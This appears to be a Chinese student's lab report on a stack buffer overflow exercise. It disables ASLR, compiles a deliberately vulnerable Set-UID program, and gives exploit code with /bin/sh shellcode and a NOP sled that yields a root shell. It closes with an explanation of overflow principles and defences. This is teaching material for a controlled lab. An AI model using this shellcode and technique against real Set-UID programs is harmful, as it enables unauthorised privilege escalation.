首页 > 其他分享 >2022-2023-1 20221307 实验七-缓冲区溢出实验实验报告

2022-2023-1 20221307 实验七-缓冲区溢出实验实验报告

时间:2022-12-08 11:48:19浏览次数:102  
标签:x90 buffer badfile 实验 2022 2023 缓冲区 stack 溢出

实验环境:16.04 64位 ubuntu
实验步骤
1.因本实验需在32位环境下操作,因此输入一些命令进行软件包更新
sudo apt-get update
sudo apt-get install -y lib32z1 libc6-dev-i386 lib32readline6-dev
sudo apt-get install -y python3.6-gdbm gdb

2.Linux和一些系统中会随机化进行分配储存地址,而猜测储存地址是本实验完成的关键,下面使用命令来关闭这一功能

sudo sysctl -w kernel.randomize_va_space=0

 

 3.此外,为了进一步防范缓冲区溢出攻击及其它利用 shell 程序的攻击,许多shell程序在被调用时自动放弃它们的特权。因此,即使你能欺骗一个 Set-UID 程序调用一个 shell,也不能在这个 shell 中保持 root 权限,这个防护措施在 /bin/bash 中实现。

linux 系统中,/bin/sh 实际是指向 /bin/bash 或 /bin/dash 的一个符号链接。为了重现这一防护措施被实现之前的情形,我们使用另一个 shell 程序(zsh)代替 /bin/bash。下面的指令描述了如何设置 zsh 程序:

sudo su
cd /bin
rm sh
ln -s zsh sh
exit

4.输入命令

linux32

 

 5.输入命令切换到tmp目录,并建立stack.c文件

cd /tmp
vim stack.c

6.以下stack.c文件的内容

/* stack.c */

/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[12];

    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}

 

 

 7.编译该程序,并设置SET-UID,采用命令

sudo su
gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
chmod u+s stack
exit

  

 

 其中,-fno-stack-protector用来关闭gcc中越界保护机制

 8.攻击程序

/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\x31\xc0" //xorl %eax,%eax
    "\x50"     //pushl %eax
    "\x68""//sh" //pushl $0x68732f2f
    "\x68""/bin"     //pushl $0x6e69622f
    "\x89\xe3" //movl %esp,%ebx
    "\x50"     //pushl %eax
    "\x53"     //pushl %ebx
    "\x89\xe1" //movl %esp,%ecx
    "\x99"     //cdq
    "\xb0\x0b" //movb $0x0b,%al
    "\xcd\x80" //int $0x80
    ;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");   //在buffer特定偏移处起始的四个字节覆盖sellcode地址  
    strcpy(buffer + 100, shellcode);   //将shellcode拷贝至buffer,偏移量设为了 100

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

  程序功能,越界获取root权限

 

 9.GDB调试stack

输入命令

gdb stack
disass main

  

 

 10.设置断点,我运行的结果是0x080484ee,运行命令

# 设置断点
b *0x080484ee
r
i r $esp

  

 

 11.修改攻击程序

输入命令

vi expolit.c
i/*找到/x??的位置反着将得到地址替换*/

 

 

12.运行程序获得权限

 

输入命令

./exploit
./stack

13.获得权限

输入命令

whoami

 

 

 

缓冲区溢出的原理和防范:


1.原理:

由于C/C++语言本身没有数组越界检查机制,当向缓冲区里写入的数据超过了为其分配的大小时,就会发生缓冲区溢出。

攻击者可以利用缓冲区溢出来窜改进程运行时栈,从而改变程序的正常流向。

 

缓冲区溢出漏洞是一种古老、危害范围大、常见于c代码中的软件漏洞,在各种操作系统、应用软件中广泛存在,数据库系统中同样常见。利用缓冲区溢出攻击,可以导致程序运行失败、系统宕机、重新启动等后果。更为严重的是,攻击者可以利用它执行非授权指令,甚至取得系统特权,进而实行攻击行为。

缓冲区溢出漏洞最早在20世纪80年代初被发现,第一次重大事件是1988年爆发的Morris蠕虫。该蠕虫病毒利用fingerd的缓冲区溢出漏洞进行攻击,最终导致6000多台机器被感染,造成直接经济损失100万美金。随后,衍生而出的Ramen 蠕虫、sircam蠕虫、sql slammer蠕虫等品种逐渐出现,每一类蠕虫都对整个互联网造成了严重的安全影响,造成高额的经济损失。

 

 

其中共享区也称为data区,用来存储可执行代码;.text和.bss均用来存储程序的全局变量和初始化变量;堆则不随函数消亡而消亡,而是直到程序消亡或手动释放才会消亡;堆栈是随着函数分配并消亡的,堆栈溢出就是出现在堆栈区中的缓冲区安全问题。

堆栈是一个后进先出(LIFO)数据结构,往低地址增长,它保存本地变量、函数调用等信息。随着函数调用层数的增加,栈帧会向低地址方向延伸;随着进程中函数调用层数的减少,即各函数的返回,栈帧会一块一块地被遗弃而向内存的高地址方向回缩。各函数的栈帧大小随着函数的性质不同而不等。

堆栈这种数据结构,常见操作有压栈(PUSH)、弹栈(POP);用于标识栈的属性有:栈顶(TOP)、栈底(BASE)。其中:

PUSH:为栈增加一个元素的操作叫做PUSH,相当于插入一块;

POP:从栈中取出一个元素的操作叫做POP;

TOP:TOP标识栈顶的位置,且是动态变化的,每做一次PUSH操作,它会自+1;每做一次POP操作,它会自-1;

BASE:BASE标识栈底位置,用于防止栈空后继续弹栈,一般来说BASE位置不发生改变。

  2.防范:

1) 使用自动化工具进行扫描检测,排查是否存在缓冲区溢出漏洞;但需要注意的是需要使用面向不同系统的扫描工具,没有一个检查工具可以支持所有基础应用的扫描。

2) 加强相关程序员的代码能力,做好相应的长度限制工作,从代码级别进行防范。

3)避免使用原C库中那些可能存在缓冲区溢出隐患的函数,使用增强后的函数,这样此漏洞出现的几率会相对低一些。






标签:x90,buffer,badfile,实验,2022,2023,缓冲区,stack,溢出
From: https://www.cnblogs.com/zhangchengwei/p/16965635.html

相关文章

  • 黑马程序员2022新版SSM框架Spring+SpringMVC+Maven高级+SpringBoot+MyBatisPlus企业实
    Spring为什么要学Spring?1.专业角度:简化开发,降低企业级开发的复杂性框架整合,高效整合其他计算,提高企业级应用开发与运行效率2.学什么?简化开发IOCAOP事务......
  • 【2022-12-04】连岳摘抄
    23:59人的口腹不应该饥不择食,伤害自己的肠胃;人的精神也不应该因为空虚、贫乏、压抑而轻易就范,不择正误、不辨真伪、不分析不判断地接受各种大言欺世、极端煽情、片面夸张......
  • 【2022-12-03】连岳摘抄
    23:59“人人都有一本难念的经”,所以我说“不完美才是人生”。这是一个“平凡的真理”,但是真能了解其中的意义,对己对人都有好处。对己,可以不烦不燥;对人,可以互相理解。这会......
  • 《DFZU2EG_4EV MPSoc之FPGA开发指南》第十一章 IP核之MMCM/PLL实验​
    IP核之MMCM/PLL实验​PLL的英文全称是PhaseLockedLoop,即锁相环,是一种反馈控制电路。PLL对时钟网络进行系统级的时钟管理和偏移控制,具有时钟倍频、分频、相位偏移和可编程......
  • 《DFZU2EG_4EV MPSoc之FPGA开发指南》第十二章 IP核之RAM实验
    IP核之RAM实验RAM的英文全称是RandomAccessMemory,即随机存取存储器,它可以随时把数据写入任一指定地址的存储单元,也可以随时从任一指定地址中读出数据,其读写速度是由时钟频......
  • 创赢未来,零数科技入选2022年度科创独角兽TOP50
    12月7日,年度重磅榜单“2022年度科创独角兽TOP50”公布,零数科技作为唯一一家区块链厂商入选该榜单。独角兽企业一般是指未上市的高成长性企业,作为近年来发展速度最快,具备最高......
  • 2022/12
    quantumchemistryallcontent:650pagesspeed:10minperpagealltime:6500min/108.3hmyspeed:3hourperdaymyalltime:36daysViewCode ......
  • 2022最新可用,喜马拉雅付费音频爬取工具,给力推荐!
    之前找了几个Python爬取喜马拉雅付费音频的脚本,但是无奈好多都用不了了,毕竟经常算法更新什么的,然后自己又不会写代码,太难了。 找了好久,终于找到一款不需要会代码就能爬......
  • 「亲测可用」2022喜马拉雅VIP,VIP付费音频专辑下载!
    喜马拉雅2022永久VIP专辑下载,本身喜马拉雅是无法破解的,市面上的破解版也是不可以用的。 但是可以通过购买一个临时的VIP会员,然后通过下面这个喜马拉雅VIP专辑下载器,将想......
  • 从 “反相, 一个实验 就够” 说起
    这篇文章的起因是  苍老师  @苍松翠柏04  的  《反相,谁能拿出真凭实据。》    https://tieba.baidu.com/p/8175619781   。 经常听到维......